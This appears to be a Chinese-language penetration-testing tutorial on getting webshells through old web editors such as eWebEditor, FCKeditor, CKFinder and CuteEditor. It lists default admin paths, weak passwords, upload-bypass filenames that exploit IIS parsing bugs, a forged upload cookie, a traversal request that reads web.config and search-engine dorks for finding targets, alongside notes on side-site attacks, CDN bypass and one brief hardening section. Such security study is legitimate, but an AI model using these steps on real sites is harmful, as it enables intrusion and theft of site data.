编辑器漏洞

一.本文介绍

1、本文介绍Ewebeditor常识、获取webshell、fckeditor获取webshell、旁注原理、ip逆向查询、目录越权及跨库查询、cdn绕过。

二.学习步骤

1、Ewebeditor常识:

默认后台:xxxx.com/ewebeditor/admin_login.asp

数据库地址:ewebeditor/db/ewebeditor.mdb

帐号:admin     密码:admin/admin888/admin000(各种弱口令)

常用数据库路径为:

ewebeditor/db/ewebeditor.asa

ewebeditor/db/ewebeditor.asp

ewebeditor/db/#ewebeditor.asa

ewebeditor/db/#ewebeditor.mdb

ewebeditor/db/ewebeditor.mdb

ewebeditor/db/!@#ewebeditor.asp

ewebeditor/db/ewebeditor1033.mdb 等

默认数据库下载报错。(.mdb被保护了,从这里找到.mdb删除就好了)


2、Ewebeditor后台获取webshell


1. http://IP/admin_login.asp:账号:admin 密码:admin,然后添加样式,

在图片类型中加入以下类型:asa|cer|asp|aaspsp


最后添加工具栏:插入或修改图片

2. 工具栏添加好后点击“预览”,上传在样式的图片格式中加入cer或asp等,我上传的是shell.cer,然后在代码的地方可以看到URL,然后菜刀连接即可。用低版本浏览器,高版本可能打不开.

2)目录遍历  

 点击"上传文件管理" 然后选择样式目录。

在id=14后面加上&dir=../,发现没有起作用,那就是2.1.6这个版本不存在这个漏洞。换成2.8.0。2.8.0存在这个文件遍历漏洞。

4. 在下载的数据库中看eWebEditor_style表中的S_ImageExt字段是否有被人添加过什么。

使用下面的语句进入突破:

ewebeditor.asp?ID=xx&style=yy  其中的id=xx就是被修改过的那条记录的id,而yy就是S_name字段的名字。

3、Ewebeditor文件上传实验

将代码新建为html:



创建完直接打开,点击上传按钮将马上传,右键查看源代码:

默认文件上传保存的路径为ewebiditor/uploadfile,访问:http://IP/uploadfile/2020417145621756.cer,输入马的密码:

4、fckeditor获取webshell

1.查看编辑器版本

FCKeditor/_whatsnew.html

2.FCKeditor编辑器页

FCKeditor/_samples/default.html

3.常用上传地址

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

2.5的版本下面这条语句能用:

http://192.168.87.129:8234//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

若出现:

根据提示,需要:

开启文件上传功能,把\editor\filemanager\connectors\asp\config.asp文件中的

DimConfigIsEnabled

ConfigIsEnabled = False

设置成功true。

手工新建:

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=fendo.asp

原因:

CurrentFolder:当前文件夹 未进行过滤(这个文件夹下的没有过滤)

NewFolderName:新建文件名 进行了过滤

添加敏感文件夹

敏感目录

登录即可获取shell

CKFinder编辑器:

任意文件上传漏洞

其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件,CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传1_php;1.jpg等畸形文件名,最终导致文件上传漏洞

然后修改文件名

1_php;1.jpg

利用iis6.0目录解析漏洞拿shell

创建目录/x.asp/

在目录下上传图片马即可拿shell

southidceditor :南方数据编辑器

任意文件上传漏洞

首先登陆后台

利用编辑器上传

访问admin/southidceditor/admin_style.asp

修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传

UEDITOR编辑器:

利用ii6.0文件名解析漏洞

上传图片改名为:

x.php;20221.jpg获取shell

DotNetTextBox编辑器:

任意文件上传漏洞

关键字:system_dntb/

确定有system_dntb/uploadimg.aspx并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具

cookie:UserType=0;IsEdition=0;Info=1;

uploadFolder=../system_dntb/Upload/;

路径可以修改,只要权限够,上传后改名为1.asp;.jpg利用iis解析漏洞

Kedit编辑器:PHPWEB网站管理系统后台

两种利用方式:

第一种是利用iis6.0文件名解析漏洞:

xx.php;xx.jpg

第二种方式:

%00截断

xx.php%00jpg

ute Editor在线编辑器:

本地包含漏洞

影响版本:

Cute Editor For Net 6.4

脆弱描述:

可以随意查看网站文件内容,危害较大

攻击利用:

http://www.xx.com/Cute_Client?CuteEditor/Load.ashx?type=image&file=../../../web.config

Cute Editor Asp.Net版:

利用iis解析漏洞获得权限

影响版本:

CuteEditor for ASP.NET中文版脆弱描述:

脆弱描述:

CuteEditor对上传文件名未重命名,导致其可利用IIS文件名解析Bug获得webshell权限。

攻击利用:

可通过在搜索引擎中键入关键字 inurl:Post.aspx?SmallClassID= 来找到测试目标。

在编辑器中点击“多媒体插入”,上传一个名为“xxx.asp;.avi”的网马,以此获得权限。


5、旁注原理

主站不存在漏洞,通过同服务器的其它站点存在的漏洞,进而获取整个服务器网站的权限,进行控制。

6、ip逆向查询

可通过ping 域名获取其相关IP地址,之后通过IP地址反查获取其旁注的域名。

相关网址:

http://tool.chinaz.com/Same/

http://dns.aizhan.com/

http://www.11best.com/ip/

目录越权:

通过一个网站的目录访问统一服务器下的其他网站的目录,一个网站被攻陷,全都被攻陷

防御方法:每个网站创建一个不同的账号

1、建立一个账号test,默认在 users 组

2、将网站的身份验证和访问控制的匿名访问更换为test

3、将IUSR删除,添加test用户,需要注意的是,尽量不要同时给读取运行和写入权限,读写分离。

4、如果要绝对的安全,可以将C盘的访问权限设置为仅管理员访问


跨库查询:是指由于权限设置不严格,导致普通帐号被授予过高的权限,从而使得其可以对其他的数据库进行操作。比如,在mysql中,informatin_schema

这个表默认只有root有权限进行操作。但是如果一个普通账户权限过高后,他便可以对该数据库进行操作,从而影响整个mysql数据库的运行。

sqlmap里面使用“—current-代表”进行判断当前库是哪个。Mysql的root、mssql的sa、oracle的sys 分别是其数据库中权限最大的账户。

8、cdn绕过

1.利用SecurityTrails平台

2. 二级域名或泛解析ping

3.nslookup

4.https://dnsdb.io/zh-cn/ ###DNS查询

https://x.threatbook.cn/ ###微步在线http://toolbar.netcraft.com/site_report?url= ###在线域名信息查询http://viewdns.info/ ###DNS、IP等查询

https://tools.ipip.net/cdn.php ###CDN查询IP

你可能感兴趣的:(编辑器漏洞)